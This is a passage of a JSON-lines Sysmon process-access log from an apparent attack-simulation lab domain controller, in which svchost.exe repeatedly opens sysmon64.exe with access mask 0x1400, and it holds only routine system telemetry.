06:51:58.444","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4126,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:58.444\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:58.444","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4127,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:58.444\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:58.444","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4128,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:58.444\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:58.444","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4129,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:58.444\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:58.444","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4130,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:58.444\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:58.444","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4131,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:58.444\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:58.444","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4132,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:58.444\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:58.444","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4133,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:58.444\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 